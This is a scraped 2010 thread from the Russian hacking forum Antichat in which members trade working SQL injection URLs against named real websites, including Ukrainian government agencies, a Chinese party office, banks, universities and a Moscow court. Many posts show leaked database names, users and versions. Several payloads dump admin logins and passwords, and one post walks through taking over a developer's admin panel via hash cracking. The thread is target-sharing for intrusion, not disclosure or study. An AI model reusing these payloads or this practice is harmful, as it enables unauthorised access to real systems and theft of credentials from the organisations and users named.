Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
18.01.2010, 02:27
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
http://www.trt.ru/Stock.php?Part=500+union+select+1,concat_ws%280x3a ,unhex%28hex%28version%28%29%29%29,unhex%28hex%28u ser%28%29%29%29,unhex%28hex%28database%28%29%29%29 %29,3,4,5,6,7,8,9--+
4.1.18:trt@rex.hc.ru:wwwtrtru
тиц 350
выводим в ошибке!
http://www.iling-ran.ru/index.php?part=374+or+(select+count(*)+from+(selec t+1+union+select+2+union+select+3)x+group+by+conca t(version(),0x3a,database(),0x3a,floor(rand(0)*2)) )--
Version: 4.1.25-log:
DB: ilingra6_site
user: ilingra6_bd@localhost
OS: portbld-freebsd6.3
Последний раз редактировалось Strilo4ka; 18.01.2010 в 08:11..
|
|
|
18.01.2010, 17:54
|
|
Участник форума
Регистрация: 23.01.2008
Сообщений: 182
Провел на форуме:
2268999
Репутация:
410
|
|
Код:
http://flyingweb.dreamhosters.com/note_news.php?rid=-10+union+select+1,2,3,4,group_concat(concat_Ws(0x3a,loginName,password)),6,7,8,9,10,11,12,13,14,15,16+from+flyingweb.flyingweb_admin_user---
5.0.67-userstats-log
flyingweb
zyf2008@bowser.dreamhost.com
Последний раз редактировалось Amoura; 18.01.2010 в 18:05..
|
|
|
|
18.01.2010, 19:52
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
http://libserv.tspu.edu.ru/documentation/shou_dokument.php?id=-6+union+select+1,concat_ws%280x3a,user%28%29,versi on%28%29,database%28%29,@@version_compile_os%29,3, 4,5,6,7,8
polevivan@localhost:5.0.84-log:libserv  c-linux-gnu polevivan@localhost:5.0.84-log:libserv c-linux-gnu
http://libserv.tspu.edu.ru/documentation/shou_dokument.php?id=-6+union+select+1,2,3,group_concat%28concat_ws%280x 40,login,password%29%20separator%200x3a%29,5,6,7,8 +FROM+Administrtion
http://libserv.tspu.edu.ru/documentation/shou_dokument.php?id=-6+union+select+1,2,3,group_concat%28concat_ws%280x 40,login,password%29%20separator%200x3a%29,5,6,7,8 +FROM+tspu1.administrtion
|
|
|
|
19.01.2010, 01:53
|
|
Познающий
Регистрация: 21.07.2007
Сообщений: 68
Провел на форуме:
947074
Репутация:
257
|
|
Коммунистическая партия Китая. Организация департамента Dashiqiao
http://www.dsqzzb. gov.cn/kxfz/news.php?sid=-23+union+select+1,version()--+
У кого там зуб на Украину? :P.. у меня нет.. ) Там щас выборы в Украине..Потому.. 
Официйний сайт Державного департамента з усиновлення та захисту прав дитини Міністерства України у справах сім'ї, молоді та спорту
http://www.ditu. gov.ua/en/decrees/-2177+union+select+1,2,3,4,5,concat_ws%280x3a,user% 28%29,version%28%29,database%28%29%29,7,8,9,10,11, 12,13,14,15,16+from+mysql.user--+
user() - root@localhost
version() - 5.0.51b-community-nt-log
database() - depdeti
file_priv = Y
/phpmyadmin/ присутствует
/admin/ тоже
Чернігівська облдержадміністрація
http://cg. gov.ua/single_page.php?menu_id=-5+union+select+1,usesuper||chr%2858%29||passwd+fro m+pg_user+LIMIT+1+OFFSET+0--+&NameTable=static_page&TypeCod=&DEPAT=27&pm=green _menu
http://cg.gov.ua/single_page.php?menu_id=-5+union+select+1,usesuper||chr%2858%29||passwd+fro m+pg_user+LIMIT+1+OFFSET+0--+&NameTable=static_page&TypeCod=&DEPAT=27&pm=green _menu
http://cg.gov.ua/single_page.php?menu_id=-5+union+select+1,user||chr%2858%29||passwd+from+co m.users+LIMIT+1+OFFSET+0--+&NameTable=static_page&TypeCod=&DEPAT=27&pm=green _menu
http://cg.gov.ua/static_list.php?menu_id=1&NameTable=static_list&Ty peCod=&DEPAT=29+and+1=cast%28%28SELECT+current_use r||chr%2858%29||current_database%28%29||chr%2858%2 9||version%28%29%29+as+int%29--&pm=blue_menu
http://sosadm.cg. gov.ua/single_page.php?menu_id=-5+and+1=cast%28%28SELECT+current_user||chr%2858%29 ||current_database%28%29||chr%2858%29||version%28% 29%29+as+int%29--&NameTable=static_page&TypeCod=&DEPAT=27&pm=green_ menu
user - www
database - portal
version - PostgreSQL 8.3.5 on i686-pc-linux-gnu, compiled by GCC gcc (GCC) 4.2.4
Как я понял, все поддомены там под одним юзвером и двигом. Получается добавим список уязвимых (под)сайтов.
bobradm.cg. gov.ua
borzadm.cg. gov.ua
chernrda.cg. gov.ua
goradm.cg. gov.ua
ichadm.cg. gov.ua
koradm.cg. gov.ua
kpadm.cg. gov.ua
kuladm.cg. gov.ua
meadm.cg. gov.ua
neadm.cg. gov.ua
nosadm.cg. gov.ua
novgadm.cg. gov.ua
oda.cg. gov.ua
pladm.cg. gov.ua
rpadm.cg. gov.ua
schorsadm.cg. gov.ua
semadm.cg. gov.ua
sribadm.cg. gov.ua
taladm.cg. gov.ua
varadm.cg. gov.ua
не кисло
Система розкриття інформації на фондовому ринку України. Агентство по развитию инфраструктуры фондового рынка Украины
http://www.smida. gov.ua/emitents/zvit_menu.php?id=4746+and+substring(version(),1,1) =4&forma=PERSON_Z&zvit_type=zat414&kod=32979387
http://old.smida.gov.ua/news/sv_1.php?id_news=-8077+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,use r(),version(),database()),9,10,11,12,13,14
Disallow: /adminzone/
phpinfo.php на месте 
user() - dbu@localhost
version() - 4.1.20-log
database() - smida
ВИЩА КВАЛІФІКАЦІЙНА КОМІСІЯ АДВОКАТУРИ при Кабінеті Міністрів України
http://www.vkka. gov.ua/index.php?page=katalog&id=-41+union+select+1,concat_ws%280x3a,version%28%29,u ser%28%29,database%28%29%29,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17--+
version() - 5.1.30-log
user() - vkka_root@localhost
database() - vkka_adv
все выводиться на ура
админка присутствует.
Последний раз редактировалось v1d0qz; 19.01.2010 в 01:58..
|
|
|
|
20.01.2010, 10:48
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
http://www.htf.ru/?pageId=5&newsId=-10+union+select+1,2,3,concat_ws(0x3a,user(),databa se(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19+--+
htf@localhost:htf:5.0.77-log
|
|
|
|
20.01.2010, 14:23
|
|
Познающий
Регистрация: 21.07.2007
Сообщений: 68
Провел на форуме:
947074
Репутация:
257
|
|
Если кому интересно, большинство сайтов тицастые и пиаристые.
--- 1---
http://mgta.ru/raspisania/rasp'+or(1,1)=(select+count(*),concat(concat(1,0x3 a,(select+concat(user,0x3a,password,0x3a,file_priv )+from+mysql.user+LIMIT+0,1)),floor(rand(0)*2))fro m+mysql.user+group+by+2)--+/
version() - 5.0.841
user() - meli@localhost1
database() - wwwmeliru_sb1
Права на запись есть.
--- 3-blind---
http://nova-budova.com.ua/?n=press_center&type=shares'+and+substring(version (),1,1)='5
5-я версия
//=============================================== start usoft
Уязвимости от компании Ю-софт. Разрабатывают сайты 16 лет.
Особенность: 1. На некоторых уязвимых сайтах нельзя подставить 'пробел' '*'. Вывод ошибки работает в опере, в мозиле не работает. Все сайты которые я просмотрел, я вылаживаю.
Возможные варианты вывода.
--- 4-банк---
http://web.altabank.ru/cervice/chapter_1/mbotvetstv'or(1,1)=(select*from(select(name_const( (select(table_name)from(information_schema.tables) where(table_name)LIKE('CHARACTER_SETS')),1)),name_ const((select(table_name)from(information_schema.t ables)where(table_name)LIKE('CHARACTER_SETS')),1)) a)='5/
http://web.altabank.ru/cervice/chapter_1/mbotvetstv'or(1,1)=(select*from(select+name_const( version(),1),name_const(version(),1))a)='5
Остальные сайты..
--- 6-Blind. Ещё один сайт юсофта---
Тут пробелы не фильтруются, но и вывода в дублях нету. поэтому получается blind inj
http://u-torg.ru/news/?act=show_news&id=2489+and+substring(version(),1,1 )=5#
--- 7-Компания---
http://www.interstroy-v.ru/objects/ob30'or(1,1)=(select*from(select+name_const(versio n(),1),name_const(version(),1))a)='5
--- 8-компания---
http://www.priorityins.ru/fiz'or(1,1)=(select*from(select+name_const(version (),1),name_const(version(),1))a)='5
--- 9-Банк солидарность---
http://www.solidar.ru/news'or(1,1)=(select(0)from(select+name_const(vers ion(),1),name_const(version(),1))a)='5/new_kart/
--- 10-blind. Какой сайт, понятно по названию---
http://mos-gorsud.ru/news/?id=235+and+lower(ascii(substring(user(),1,1)))=11 4
root@....
Ну и в заключение...
--- 11-Usoft---
Ну собственно как же оставить без внимания сам сайт Ю-софта..
Для начала найдём какуе-то инъекцию у них на сайте. А именно...
http://www.usoft.ru/vopros/legalnews'or(1,1)=(select*from(select+name_const(v ersion(),1),name_const(version(),1))a)='5/
Всё ок, но как же нам упростить задачу по перебору? Давайте посмотрим что там ещё висит у них.. Находим такой поддомен.
http://pilot.usoft.ru
Составим запрос для подбора таблички.
http://pilot.usoft.ru/?tid=4+or(1,1)=(select+count(0),concat((select+tab le_name+from+information_schema.tables+limit+17,1) ,floor(rand(0)*2))from(information_schema.tables)+ group+by+1)+--+
Теперь для быстрого подбора колонки. Я сделаю это так.
http://pilot.usoft.ru/?tid=4+or(1)=(select+*+from(select+*+from+auth_use r+as+a+auth_user+as+b+USING(id))c)--+
Далее собственно подставляем в USING то что вылазит в эроре.
Ну а потом, достаем логины и пароли. Пароли там в md5, но первый же юзер как ни странно админский с хешем который мгновенно расшифровуется через crackfor.me
Ну и в конце логинимся через /admin/, никакх защит по ip как ни странно там нету.
Внимание! В примере номер 11 стоит моя личная защита "антидурак"
//================================================ end usoft
--- 12-сайт не ломать ---
http://www.blagodel.ru/action/2006_blago_1/photos' and 1=(select * from(select * from information_schema.tables a JOIN information_schema.tables b)c)='1
http://www.blagodel.ru/action/2006_blago_1/photos' and 1=(select * from(select * from (select * from information_schema.tables a)b JOIN (select * from information_schema.tables d)c USING(TABLE_CATALOG))g)='1
запятые косят запрос. Получилось вывести только так. Если кто выведет проще, буду рад посмотреть.
--- 13---
http://www.vstoneft.ru/analit.php?number=141+union+select+1,2,3,4,5,6,ver sion(),8,9--
--- 14---
http://www.mebel-aliance.ru/tables.php?id=63'+union+select+1,2,3,4,concat(tabl e_schema,0x3a,table_name,0x3a,column_name),6,7,8,9 ,10,11,12,13,14+from+information_schema.columns--+
без ограничения
--- 15---
http://www.platforma.ru/search/?search=%'+and+(1,1)=(select+count(*),concat(versi on(),floor(rand(0)*2))from+essentials+group+by+2)+--+
version() - 4.1.21
user() - platforma@www.plus.ru
database() - platforma
//================================================ start News Edit
Движок News Edit от Newsedit.ru
Снова ошибка в переменной которая обратабывается через .htaccess, такое чувство разработчики думают, что htaccess что-то фильтрует.
--- 16---
http://www.wn.ru/video/01.12.2009/2+union+select+1,version(),3,4,5,6,7,8,9,10--.html
--- 17---
http://www.cdrinfo.ru/news/28.10.2009/2+union+select+1,version(),3,4,5,6,7,8,9,10--.html
--- 18---
http://www.parovozik.ru/news/11.11.2009/2+union+select+1,version(),3,4,5,6,7,8,9,10--.html
--- 19-1500 тица ---
тут пароля в открытом виде
http://pro-n.ru/news/12.01.2010/2+union+select+1,version%28%29,3,4,5,6,7,8,9,10+fr om+users--.html
//================================================ end News Edit
--- 20---
ууу, какой страшный сайт.. :P
http://www.stalin.su/book.php?bid=1+or(1,1)=(select+count(0),concat((se lect+table_name+from+information_schema.tables+lim it+26,1),floor(rand(0)*2))from(information_schema. tables)+group+by+2)+--+
http://www.stalin.su/book.php?bid=1+or(1,1)=(select*from(select*from+st _xuser+as+a+join+st_xuser+as+b+USING(id))c)+--+
http://www.stalin.su/book.php?bid=1+or(1,1)=(select+count(0),concat((se lect+concat_ws(0x3a,access,login,password)+from+st _xuser+LIMIT+0,1),floor(rand(0)*2))from(informatio n_schema.tables)+group+by+2)+--+
--- 21---
http://www.inform-soccer.com/TOTO/tstscores.php3?TURNIR=409&ID=-158682+union+select+1,2,3,version(),5,6--
version() - 4.1.25-log
user() - soccer@localhost
database() - inform_soccer_com
--- 22-Blind---
http://www.skoma.ru/catbuilder.php?id=24+and+substring(version(),1,1)= 4
--- 23---
http://www.stroimarket.info/goods.php?viewprod=2&id=5&pid=10'+or(1,1)=(select+ *+from(select+name_const((select+table_name+from+i nformation_schema.tables+WHERE+table_name+LIKE+'%u ser%'+LIMIT+0,1),1),name_const((select+table_name+ from+information_schema.tables+WHERE+table_name+LI KE+'%user%'+LIMIT+0,1),1))a)/*
--- 24---
вывод смотрите в html, он вообщем в хрефе.
http://mirrortuning.ru//oneadmin/
http://mirrortuning.ru/photos.php?category_id=&parent_id=-0+UNION+SELECT+version(),2&photo_id=18&start=123
Database Version: 5.0.67-userstats-log
Database name: mt
User name: ender@tampico.dreamhost.com
--- 25-Blind---
http://www.gestia.com.ua/fs/wywod_stati/?showiblo=332'+and+substring(version(),1,1)=4/*
--- 26---
Вывод после редиректа в адресной строке.
http://test-d.cncinfo.ru/index.php?id=-213+union+select+1,2,3,4,5,6,7,concat(version(),da tabase(),user()),9,10
http://test-d.cncinfo.ru/index.php?id=-213+union+select+1,2,3,4,5,6,7,concat(table_schema ,0x3a,table_name),9,10+from+information_schema.tab les+where+table_name+LIKE+'%user%'+LIMIT+0,1
--- 28---
Без ограничений.
http://www.infra-audit.ru/doc.php?doc_id=4+union+select+1,concat_ws(0x3a,tab le_schema,table_name,column_name),3,4,5,6,7+from+i nformation_schema.columns
--- 29---
Без ограничений.
http://www.buketbutik.ru/search/adv/?form=1%27%29%29%20AND%20_goods.osn=%271%27%20AND% 20_goods.is_publish=%271%27%20AND%20_subcats.is_pu blish=%271%27%20AND%20_cats.is_publish=%27%27%20AN D%20_subcats.id=_goods.ids%20AND%20_cats.id=_goods .idc%20union+select+1,2,3,4,5,concat_ws%280x3a,tab le_schema,table_name,column_name%29,7,8,9+from+inf ormation_schema.columns+where+table_name=%27_users %27+--+
http://www.buketbutik.ru/search/adv/?form=1%27%29%29%20AND%20_goods.osn=%271%27%20AND% 20_goods.is_publish=%271%27%20AND%20_subcats.is_pu blish=%271%27%20AND%20_cats.is_publish=%27%27%20AN D%20_subcats.id=_goods.ids%20AND%20_cats.id=_goods .idc%20union+select+1,2,3,4,5,concat_ws%280x3a,log in,assword,mail%29,7,8,9+from+_users+LIMIT+200+--+
http://www.buketbutik.ru/search/adv/?form=1%27%29%29%20AND%20_goods.osn=%271%27%20AND% 20_goods.is_publish=%271%27%20AND%20_subcats.is_pu blish=%271%27%20AND%20_cats.is_publish=%27%27%20AN D%20_subcats.id=_goods.ids%20AND%20_cats.id=_goods .idc%20union+select+1,2,3,4,5,concat_ws%280x3a,adm in_firstname,admin_lastname,admin_password,admin_e mail_address,admin_right_access%29,7,8,9+from+admi n+LIMIT+200+--+
--- 30---
http://www.iie.tpu.ru/ru/seenews.php?IDNews=159+and+substring(version(),1,1 )=3
3-я версия.
--- 31---
http://bellenmetip.net/actueel/nieuws/329/nassau-academy-unieke-samenwerking-onderwijs-en-bedrijfsleven'+or(1,1)=(select*from(select+name_co nst(version(),1),name_const(version(),1))b)+--+/
--- 32-blind---
http://www.arbonica.ru/marketing'+or+substring(version(),1,1)=5--+/
перебирать можно так..
http://www.arbonica.ru/marketing'+and+lower(ascii(substring(user(),1,1))) =114
юзвер != рут 
--- 33---
Sweb блочит 'from', через post - сценарий не работает. Потому можно получить только user(), version() etc...
http://www.beauty-fitness.ru/users/?id=-1324'+union+select+1,user(),3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30--+
--- 34---
http://www.my-antiage.ru/index.php?id=49+union+select+1,2,3,4,5,version(),7 ,8,9--
version() - 4.1.25-log
user() - lipopla8_sdr@localhost
database() - lipopla8_acc
--- 35---
http://cdd.aac.ru/index.php?id=20'and(substring(version(),1,1))=4--+
--- 36---
http://www.chuvrdub.ru/base/base.html?mode=aut&id=-47+UNION+SELECT+1,2,version(),4--
version() - 5.0.84-percona-highperf-b18-log
user() - anhelga_user1@91.195.124.9
database() - anhelga_authors
--- 37---
http://www.hedef-makina.com/ru/index.php?p=sayfa&item=duyuru&id=-27+union+select+1,2,3,database(),5,6,7,user(),9,10 ,11--
5.0.45-community-nt
hedef-makina
hedef@localhost
--- 41---
Без ограничений
http://www.sotovyi.ru/index.php?cid=11&pid=63/**/union/**/select/**/concat(table_schema,0x3a,table_name,0x3a,column_na me),2,3,4,5,6/**/from/**/information_schema.columns--
--- 42---
http://parkhotelgardenia.com/conference_hall.php?pos=6+union+select+1,2,concat_ ws(0x3a,user(),version(),database()),4
version() - 5.0.85-community-log
user() - prkhote_slava@localhost
database() - prkhote_gardenia
Забыл какая тут табличка, а переберать в 5 утра лень) Но помню что там колонки id:username assword:idrights:realname
И пароль там подходит от мыльника админа
--------------------------------------------
Есть конечно ещё вкусное, но не всё сразу..
Чем больше критики, тем лучше, желательно пм.
Спасибо за внимание.
Последний раз редактировалось v1d0qz; 23.01.2010 в 05:14..
|
|
|
|
20.01.2010, 17:31
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
PR 5
ТИЦ 700
http://www.isp.nsc.ru/newface/index.php?ACTION=part&id_main=-1+union+select+concat_ws(0x3a,version(),database() ,user(),@@version_compile_os),2,3--+&id_sub=25&id_news=78
5.0.77-log:website:admin@www.isp.nsc.ru ortbld-freebsd7.0
BD:
Код:
information_schema:anketa:asut:dbmail:dspam:fotonika2009:glpi:invitation:ipacct:jabberd2:joomla:lib_mba:library:mysql:ng_stat:norma:ocsweb:olka:site:symposium:system_ball:test:test_lib:thesis:website:ysc:ysc_copy
http://www.isp.nsc.ru/newface/index.php?ACTION=part&id_main=-1+union+select+GROUP_CONCAT(TABLE_NAME%20SEPARATOR %200x3a),2,3+FROM%20information_schema.TABLES+WHER E%20TABLE_SCHEMA=0x77656273697465+--+&id_sub=25&id_news=78
Код:
body:body_eng:news:structure:structure_admin:structure_eng:users
с результата запроса и ежу понятно что не одна таблица users (есть в других БД) когда узанем атрибуты таблы users вот они ^_^
Код:
id:login:pass:ip:last_keepalive:type:enabled:day_quota:month_quota:fullname:desc:admin_level:id:name:passwd:sotrid:chek:id:surname:fname:secname:email:name_doclad:type_doclad:check_send:check_confirm:auth_doclad:id:name:passwd:sotrid:chek:id:user_login:user_password:user_type
логин и пасс
http://www.isp.nsc.ru/newface/index.php?ACTION=part&id_main=-1+union+select+concat_ws(0x3a,user_login,user_pass word),2,3+from+users--+&id_sub=25&id_news=78
В гугле несколько каталогов с которыми работают БД перечислены выше ,и у всех пр 5 когда посмотреть!
через этот сайт можно доставать инфу .
магические включены, есть webmail и еще много вкусностей, алгоритмы шифрования пассов md5 и mysql , кстати читалка в скуле работает , забыл сказать и хешкрекинг.инфо не выдал пасс md5 , но зато есть темка на античате <on-line сервисы розшифровки> то там нашел ;-)
в гугле для поиска других
Ех,класно что опять античат то заработал
Последний раз редактировалось Strilo4ka; 20.01.2010 в 18:38..
|
|
|
|
20.01.2010, 21:09
|
|
Banned
Регистрация: 14.01.2009
Сообщений: 515
Провел на форуме:
1996429
Репутация:
468
|
|
http://cards.km.ru/cardslist.asp?id_real={78EFE1E1-0D03-4515-8CC9-3ADC2F09D300}' and 1=@@version--'
|
|
|
|
21.01.2010, 11:42
|
|
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919
Репутация:
229
|
|
giscripts.in
Код:
http://www.giscripts.in/b2b/selloffers.php?cid=-14+union+select+1,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,3,4,5,6,7,8--
Код:
5.0.81-community:yellowpa_glrd@localhost:yellowpa_b2b
secureb2b.com
Код:
http://www.emerix.com/selloffers.php?cid=-1+union+select+1,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,3,4,5,6,7,8--
Код:
5.0.51a-24+lenny2-log:ks8136@localhost:ks8136db1
|
|
|
|
22.01.2010, 16:50
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428
Репутация:
662
|
|
Код:
http://www.vertavo.com/repspecs.php3?counter=-254+union+select+1,2,3,4,5,6,7,8+from+admin+--+
Код:
http://www.multistore.ch/index.php?catid=864+union+select+1,2,unhex(hex(user())),4,5,6+/*+&subcatid=224http://www.donpaco.ch/events_det.php?galerie_id=-278+union+select+1,2,3,4,5,6,7,8,9,10+--+
Код:
http://www.impuls-nn.ru/shop/more/?iid=-100012860+union+select+1,2,3,4,5,concat_ws(0x3a3a,cid,clogin,cpass,corg,ctype),7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+impulse_users+where+ctype=0+--+
Код:
http://www.beautifulpalestine.com/largpic.php?id=-312+union+select+1,2,3,concat_ws(0x3a3a,username,password),5,6,7+from+members+--+&lid=13
Код:
http://apla-pal.org/show_news_details.php?id=-85+union+select+1,column_name,3,4,5,6,7,8+from+information_schema.columns+where+table_name=0x7573657273+--+
Код:
http://nhn.meerbusiness.nl/partners/partners_showitems.asp?type=sponsor'+uNIon+seLEct+1,2,3,4,5+--+&content_id=6
Код:
http://femgmbh.com/photogallery.php?action=liste&rubrikid=63+union+select+database(),2+/*+
Код:
http://www.singaporechefs.com/publicsite/newsdetail.php?id=-48'+union+select+1,2,3,4,concat_ws(0x3a3a,username,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+user+--+
Код:
http://www.asiacuisine.com.sg/eventcalendar.php?eventdate=-2010-1-24'+union+select+1,concat_ws(0x3a3a,user_id,username,password,enpassword,ip,lastlogin,lastlogout,privilege),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+cwa_user+--+
Код:
http://www.gourmetabudhabi.ae/ad2010/english/representative.php?id=-60+union+select+1,2,3,4,5,6,7,8,9,10,password,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44+from+user+--+
Код:
http://www.wacs2000.org/wacs2009_beta/en/culinary_programs/competition.php?id=-18+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,unhex(hex(group_concat(TabLe_NamE))),27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46+from+information_schema.tables+group+by+table_schema+limit+2,1+--+
Код:
http://www.fischergold.de/index.php?id=-51+union+select+1+--+
Код:
http://www.alice-miller.com/readersmail_en.php?lang=en&nid=-2927+union+select+1,2,3,4+--+&grp=0110
Код:
http://www.presidence.bf/listArticles.php?sid=-10+union+select+1,2,concat_ws(0x3a3a,username,password),4+from+pbf_users+--+&page=1&articlesPerPage=5
Код:
http://southindianpost.com/gallery/index.php?page=1&category=1.1&photoId=-2+union+select+1,2,3,4,5,6,7,8,9,10+--+
Код:
http://satorisalon.ru/satlist.php?idp=-145'+union+select+1,2,3,4,5,6,7,8,9+--+
Код:
http://www.ivanenko.name/showpart.php?idp=-3'+union+select+1,2,3,4,5,6,7,8,9+from+information_schema.tables+--+
Код:
http://www.matuls.pl/index.php?IDP=1&Lng=1&IDKategoria=-9+union+select+1,2,3,4,5,6,7,concat_ws(0x3a3a,UserPass,UserName,UserEmail),9+from+CMSUsers+limit+0,1+--+
Код:
http://www.panterafilms.ru/portf/work.php?idp=-65+union+select+1,2,3,4,5,6,7,8,9,10+from+cns_config+--+
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
